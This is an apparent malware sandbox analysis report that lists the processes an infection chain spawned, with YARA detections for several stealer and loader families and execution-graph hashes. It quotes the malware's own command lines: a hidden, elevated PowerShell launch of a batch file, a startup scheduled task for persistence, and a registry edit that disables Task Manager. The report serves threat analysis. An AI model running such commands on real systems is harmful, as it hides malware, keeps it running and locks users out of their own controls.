Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1480 --field-trial-handle=1844,i,568275399353426171,11183762438970494550,262144 /prefetch:8
Imagebase:	0x7ff6c4390000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	01:40:15
Start date:	27/06/2024
Path:	C:\Users\user\AppData\Local\Temp\1000108001\ldr.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user~1\AppData\Local\Temp\1000108001\ldr.exe"
Imagebase:	0xd50000
File size:	424'960 bytes
MD5 hash:	C4AEAAFC0507785736E000FF7E823F5E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000020.00000002.1785237216.0000000000D51000.00000020.00000001.01000000.00000016.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000020.00000000.1756819585.0000000000D51000.00000020.00000001.01000000.00000016.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\1000108001\ldr.exe, Author: Joe Security
Antivirus matches:	Detection: 96%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	01:40:16
Start date:	27/06/2024
Path:	C:\Users\user\AppData\Local\Temp\1000020001\1.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user~1\AppData\Local\Temp\1000020001\1.exe"
Imagebase:	0x400000
File size:	324'608 bytes
MD5 hash:	E1B59D2805B38262B9967BCE3E719DBF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000021.00000002.2010009861.00000000025BE000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000021.00000002.2005785440.00000000023E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000021.00000002.2005785440.00000000023E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000021.00000002.2005592482.00000000023D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000021.00000002.2007530947.0000000002521000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000021.00000002.2007530947.0000000002521000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 54%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	01:40:17
Start date:	27/06/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -Command "Start-Process 'C:\Users\user~1\AppData\Local\Temp\install.bat' -Verb runAs -WindowStyle Hidden"
Imagebase:	0x7ff741d30000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	01:40:17
Start date:	27/06/2024
Path:	C:\Users\user\AppData\Local\Temp\28feeece5c\Hkbsse.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user~1\AppData\Local\Temp\28feeece5c\Hkbsse.exe"
Imagebase:	0x6d0000
File size:	424'960 bytes
MD5 hash:	C4AEAAFC0507785736E000FF7E823F5E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000023.00000000.1777423527.00000000006D1000.00000020.00000001.01000000.00000018.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000023.00000002.1794779691.00000000006D1000.00000020.00000001.01000000.00000018.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\28feeece5c\Hkbsse.exe, Author: Joe Security
Antivirus matches:	Detection: 96%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	01:40:19
Start date:	27/06/2024
Path:	C:\Users\user\AppData\Local\Temp\1000109001\alex5555555.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user~1\AppData\Local\Temp\1000109001\alex5555555.exe"
Imagebase:	0x880000
File size:	1'822'720 bytes
MD5 hash:	A80A86C701801CBD77CF7406BE6D11F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000024.00000002.1961435191.000000000099D000.00000004.00000001.01000000.00000019.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_3d9371fd, Description: unknown, Source: 00000024.00000002.1961435191.000000000099D000.00000004.00000001.01000000.00000019.sdmp, Author: unknown Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000024.00000002.1961435191.00000000008AF000.00000004.00000001.01000000.00000019.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000024.00000002.1961435191.00000000008AF000.00000004.00000001.01000000.00000019.sdmp, Author: Joe Security
Antivirus matches:	Detection: 63%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	01:40:19
Start date:	27/06/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xbf0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000025.00000002.3823740608.0000000003E25000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000025.00000002.3823740608.0000000003E25000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000025.00000002.3789215805.00000000004F0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_3d9371fd, Description: unknown, Source: 00000025.00000002.3789215805.00000000004F0000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000025.00000002.3789215805.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000025.00000002.3789215805.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	38
Start time:	01:40:19
Start date:	27/06/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -pss -s 212 -p 8560 -ip 8560
Imagebase:	0xcf0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	01:40:21
Start date:	27/06/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 8560 -s 284
Imagebase:	0xcf0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	01:40:22
Start date:	27/06/2024
Path:	C:\Users\user\AppData\Local\Temp\1000110001\123.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user~1\AppData\Local\Temp\1000110001\123.exe"
Imagebase:	0xb30000
File size:	304'128 bytes
MD5 hash:	CD581D68ED550455444EE6E099C44266
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\1000110001\123.exe, Author: Joe Security
Antivirus matches:	Detection: 68%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	01:40:22
Start date:	27/06/2024
Path:	C:\Users\user\AppData\Roaming\configurationValue\svhosts.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\configurationValue\svhosts.exe"
Imagebase:	0x870000
File size:	304'128 bytes
MD5 hash:	8A70C2805C58FCCA31037C6DD59E5833
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000029.00000000.1843357617.0000000000891000.00000002.00000001.01000000.0000001C.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Roaming\configurationValue\svhosts.exe, Author: Joe Security
Antivirus matches:	Detection: 59%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	42
Start time:	01:40:22
Start date:	27/06/2024
Path:	C:\Users\user\AppData\Roaming\configurationValue\Explorers.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\configurationValue\Explorers.exe"
Imagebase:	0x230000
File size:	343'040 bytes
MD5 hash:	894C2E356E72DA7A60C2978A258B2081
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000002A.00000000.1831961958.0000000000232000.00000002.00000001.01000000.0000001B.sdmp, Author: Joe Security Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Roaming\configurationValue\Explorers.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Roaming\configurationValue\Explorers.exe, Author: Joe Security Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: C:\Users\user\AppData\Roaming\configurationValue\Explorers.exe, Author: ditekSHen
Antivirus matches:	Detection: 39%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	01:40:24
Start date:	27/06/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user~1\AppData\Local\Temp\install.bat"
Imagebase:	0x7ff7c0280000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	01:40:24
Start date:	27/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	01:40:24
Start date:	27/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	01:40:27
Start date:	27/06/2024
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\"
Imagebase:	0x7ff60d2a0000
File size:	71'680 bytes
MD5 hash:	EF3179D498793BF4234F708D3BE28633
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	01:40:30
Start date:	27/06/2024
Path:	C:\Users\user\AppData\Local\Temp\1000111001\O3B6wY7ZkFhh.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user~1\AppData\Local\Temp\1000111001\O3B6wY7ZkFhh.exe"
Imagebase:	0x7ff67fbc0000
File size:	5'898'240 bytes
MD5 hash:	9B297A1485665AEF1A926F7CD322C932
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Go lang
Antivirus matches:	Detection: 24%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	50
Start time:	01:40:31
Start date:	27/06/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks /create /tn "Cleaner" /tr "C:\Users\user\AppData\Local\Corporation\File\RemoteExecuteScriptSilent.exe" /sc onstart /delay 0005:00
Imagebase:	0x7ff73e9b0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	01:40:33
Start date:	27/06/2024
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /f /v DisableTaskMgr /t REG_DWORD /d 00000001
Imagebase:	0x7ff7cbf20000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	52
Start time:	01:40:33
Start date:	27/06/2024
Path:	C:\Users\user\AppData\Local\Temp\1000112001\TpWWMUpe0LEV.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user~1\AppData\Local\Temp\1000112001\TpWWMUpe0LEV.exe"
Imagebase:	0xa80000
File size:	1'228'288 bytes
MD5 hash:	242214131486132E33CEDA794D66CA1F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000034.00000002.1966115508.000000006B6EE000.00000004.00000001.01000000.00000020.sdmp, Author: Joe Security Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000034.00000002.1966115508.000000006B6EE000.00000004.00000001.01000000.00000020.sdmp, Author: Joe Security
Antivirus matches:	Detection: 53%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	53
Start time:	01:40:34
Start date:	27/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	54
Start time:	01:40:34
Start date:	27/06/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
Imagebase:	0xeb0000
File size:	43'016 bytes
MD5 hash:	5D1D74198D75640E889F0A577BBF31FC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000036.00000002.2125675597.0000000003017000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000036.00000002.2124198557.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000036.00000002.2124198557.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	11.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	5.2%
Total number of Nodes:	154
Total number of Limit Nodes:	12

Executed Functions

Function 06D4E990 Relevance: 16.2, Strings: 12, Instructions: 1190COMMON

Download Yara Rule

Strings

4cq, xrefs: 06D4F324
cq, xrefs: 06D4F35E
(_q, xrefs: 06D4F42C
Hq, xrefs: 06D4F74A
Nvq, xrefs: 06D4EC98
$q, xrefs: 06D4F01B
(_q, xrefs: 06D4F446
cq, xrefs: 06D4F344
4cq, xrefs: 06D4F30A
,q, xrefs: 06D4F5AF
$q, xrefs: 06D4F9B3
$q, xrefs: 06D4F035

Memory Dump Source

Source File: 00000001.00000002.1598845560.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6d40000_1Vkf7silOj.jbxd

Similarity

API ID:
String ID: (_q$(_q$,q$4cq$4cq$Hq$Nvq$$q$$q$$q$cq$cq
API String ID: 0-2478870628
Opcode ID: 99e2330f0d2a119980d78fb55a34b1943435d0722ad1c700e0df179ef7135f2e
Instruction ID: d7edb52e04079202bb92e66b527584ecefbdcbf7d7d9e3da1445e0f5ff48ba4b
Opcode Fuzzy Hash: 99e2330f0d2a119980d78fb55a34b1943435d0722ad1c700e0df179ef7135f2e
Instruction Fuzzy Hash: EC82A770F402249FDBB9A7BA941036DA6E6BFCC601B24486ED04EDB390DE35DC4687D6

Function 06D48858 Relevance: 6.6, Strings: 5, Instructions: 301
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hq, xrefs: 06D48AC8
Hq, xrefs: 06D48B2A
Hq, xrefs: 06D48B71
Hq, xrefs: 06D48BB8
Hq, xrefs: 06D48AF9

Memory Dump Source

Source File: 00000001.00000002.1598845560.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6d40000_1Vkf7silOj.jbxd

Similarity

API ID:
String ID: Hq$Hq$Hq$Hq$Hq
API String ID: 0-3799487529
Opcode ID: b1e82c7c12e22acdafdf0fc6be0385a65e25d6fd26f426e1c02f259da5c0b3a5
Instruction ID: 7910f1f1171ea9b5d185f0f969ebb60fee334d06ace12c6639f2e7838fc9253a
Opcode Fuzzy Hash: b1e82c7c12e22acdafdf0fc6be0385a65e25d6fd26f426e1c02f259da5c0b3a5
Instruction Fuzzy Hash: 66C1DF30E00356CFCB59EF74C4502ADFBB2BF85340F288A69D446AB241DB79DA85DB90

Function 06D445F8 Relevance: 4.7, APIs: 1, Strings: 1, Instructions: 1178
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

K$, xrefs: 06D44D1A, 06D44D1F

Memory Dump Source

Source File: 00000001.00000002.1598845560.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6d40000_1Vkf7silOj.jbxd

Similarity

API ID:
String ID: K$
API String ID: 0-3418351235
Opcode ID: ae645cd0f181d9d3d5b72eb937e20c47c4fc4f2e08ea699bac965f639f90fafb
Instruction ID: 65d0468ce4d5dcb199cc7b5851b039aa777d604aefde87494b4fe9bababbdd0a
Opcode Fuzzy Hash: ae645cd0f181d9d3d5b72eb937e20c47c4fc4f2e08ea699bac965f639f90fafb
Instruction Fuzzy Hash: 2ED2B174A012298FCBA5EF28D998B9DBBB1FB49305F1081E9D40DA7354DB31AE85CF40

Function 06D407A0 Relevance: 3.3, Strings: 2, Instructions: 759
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

s\Microsoft.Windows.PinningConfirmationDialog_cw5n1h2txyewy, xrefs: 06D408BF, 06D40CEB, 06D4113E
@B/, xrefs: 06D40AC8

Memory Dump Source

Source File: 00000001.00000002.1598845560.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6d40000_1Vkf7silOj.jbxd

Similarity

API ID:
String ID: @B/$s\Microsoft.Windows.PinningConfirmationDialog_cw5n1h2txyewy
API String ID: 0-2194876659
Opcode ID: 77046c7d0d1a15fa3a2673f64c3d755ef59f6a0abf46e92f55eff11de4e7739f
Instruction ID: be7bbd5f73f664e13f54ee4ef458624879a55529e32a119e90d50aeae105f54b
Opcode Fuzzy Hash: 77046c7d0d1a15fa3a2673f64c3d755ef59f6a0abf46e92f55eff11de4e7739f
Instruction Fuzzy Hash: 51829D74E012288FDBA4DF69C984BDDBBB2BF49305F1481EAD509A7250DB319E85CF90

Function 06D46900 Relevance: 2.9, Strings: 2, Instructions: 364
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

., xrefs: 06D46B80
1, xrefs: 06D46C05

Memory Dump Source

Source File: 00000001.00000002.1598845560.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6d40000_1Vkf7silOj.jbxd

Similarity

API ID:
String ID: .$1
API String ID: 0-1839485796
Opcode ID: dadaedb0680dd35964d11316c65baac0d787a32aae60bec6cf25f4a606b05713
Instruction ID: cd7e3fcc5400cb48a27b664f82c6eb1f117dcb6dd64be9d3818807d69921506c
Opcode Fuzzy Hash: dadaedb0680dd35964d11316c65baac0d787a32aae60bec6cf25f4a606b05713
Instruction Fuzzy Hash: 5EF1D174E01328CFDB68DF65C884B9DBBB2BF89305F6081A9D40AA7254DB359E85CF50

Function 0583FC28 Relevance: 2.7, Strings: 2, Instructions: 203
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$q, xrefs: 0583FD7A
$q, xrefs: 0583FD8A

Memory Dump Source

Source File: 00000001.00000002.1597140444.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5830000_1Vkf7silOj.jbxd

Similarity

API ID:
String ID: $q$$q
API String ID: 0-3126353813
Opcode ID: b77f2aaf889921bbf950da9d70756dd15e8dc88978bd6a8827e544ac89fe1c3d
Instruction ID: 7e643f1dc19164e806d968dddd889e6f68fcdbc6fed35d09cc6c10a19280e80b
Opcode Fuzzy Hash: b77f2aaf889921bbf950da9d70756dd15e8dc88978bd6a8827e544ac89fe1c3d
Instruction Fuzzy Hash: 8691E374E01218CFCB18DFA9D584AADBBB2FF89305F608469E809AB354DB359D85CF40

Function 05837328 Relevance: 1.6, APIs: 1, Instructions: 60libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0583738D

Memory Dump Source

Source File: 00000001.00000002.1597140444.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5830000_1Vkf7silOj.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d4ba23471d8b7c9c474860b58d4b4b688b9af583ff8b6a22b81b78ebec247527
Instruction ID: 2ea50b750d5d073178f9e1e9bef5ce8f9076510c9f85db3e152d090216b71434
Opcode Fuzzy Hash: d4ba23471d8b7c9c474860b58d4b4b688b9af583ff8b6a22b81b78ebec247527
Instruction Fuzzy Hash: D021BFB4E01218DFCB08DFA9E484ADDBBB6FB89314F50906AE915F7360DB309941CB54

Function 06D49868 Relevance: .8, Instructions: 814COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1598845560.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6d40000_1Vkf7silOj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a3a6d62fd546d4a08d7f5fa06c9d207f9e13d39da3ad14c334d4d1968dabd8e
Instruction ID: d4303337b3a7a8d881dc93f81e49ad08f15a9a8a7afde10b1e11e4d2427877d0
Opcode Fuzzy Hash: 9a3a6d62fd546d4a08d7f5fa06c9d207f9e13d39da3ad14c334d4d1968dabd8e
Instruction Fuzzy Hash: D982D174A50222CFDBB4DF28D854BAA77F1BB84304F1846A8D8099B3A6E735DE45CF41

Function 05216948 Relevance: .5, Instructions: 499COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1595431543.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5210000_1Vkf7silOj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 342ae217ba7a562c0dbf687fa2c97e67b535cc1c2e4d1a82b3d58f8d4d220199
Instruction ID: 98b227527748676bf8976f1e17ed9f918fd7d1dab18fee9f698ccde9b568c439
Opcode Fuzzy Hash: 342ae217ba7a562c0dbf687fa2c97e67b535cc1c2e4d1a82b3d58f8d4d220199
Instruction Fuzzy Hash: EC22DF75911228DFDB69DF64C954BEABBB2BF4A300F0090E9D509A72A0DB359EC4CF44

Function 06D42F68 Relevance: .4, Instructions: 426COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1598845560.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6d40000_1Vkf7silOj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf5d8ca38b9179ec3c82b425d3ac34a9ffb48ef4108ca25565de210adbd8971e
Instruction ID: 3c5bcbde68af1ea57b1f72e3090e9415a771b5131541244ee96b8097b7cc3374
Opcode Fuzzy Hash: cf5d8ca38b9179ec3c82b425d3ac34a9ffb48ef4108ca25565de210adbd8971e
Instruction Fuzzy Hash: 2F228E74E012298FDB65DF69C894BD9B7B1BF89300F5081EAD54DA7250EB31AE85CF80

Function 06D42590 Relevance: .4, Instructions: 363COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1598845560.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6d40000_1Vkf7silOj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40864ef681757c197fa5111a93435116f4b3e6c419df287c8c34e82028bbf6eb
Instruction ID: d86652d63aa8acad6a62e3b8d936777689c7a0e8f16eb2b92f1ef1e4e03b74f3
Opcode Fuzzy Hash: 40864ef681757c197fa5111a93435116f4b3e6c419df287c8c34e82028bbf6eb
Instruction Fuzzy Hash: 9B02A074E01228CFDB68EF64C854B9DBBB2BF89300F5085E9D809A7254DB31AE85CF55

Function 06D41510 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1598845560.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6d40000_1Vkf7silOj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 555ac4d766e7e91882eb6ede286547e44798181e6b60f9ea7c730e7ca14a911d
Instruction ID: 619c5abb31fc2e7de422a6c6fc6d21471563676b045d4934e87ae04dbacdbd60
Opcode Fuzzy Hash: 555ac4d766e7e91882eb6ede286547e44798181e6b60f9ea7c730e7ca14a911d
Instruction Fuzzy Hash: 4DE1D374E01228CFDB64DF69C851BAEBBB2BF89300F1091AAD449B7254DB349E85CF50

Function 06D42121 Relevance: .3, Instructions: 295COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1598845560.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6d40000_1Vkf7silOj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7c7fd4ad916bae2f0f0b734b9e49c2929594c024c9905fa42b996da034546b1
Instruction ID: 3028ecafc08fb3efe05c40ccd31b28586fce2a271783521c679389a5400d46f7
Opcode Fuzzy Hash: c7c7fd4ad916bae2f0f0b734b9e49c2929594c024c9905fa42b996da034546b1
Instruction Fuzzy Hash: 15D17074E01218CFDB64DFA9D984B9DBBB2BF89300F1091A9E409AB355DB349E85CF50

Function 05218D18 Relevance: .3, Instructions: 293COMMON

Download Yara Rule

Memory Dump Source

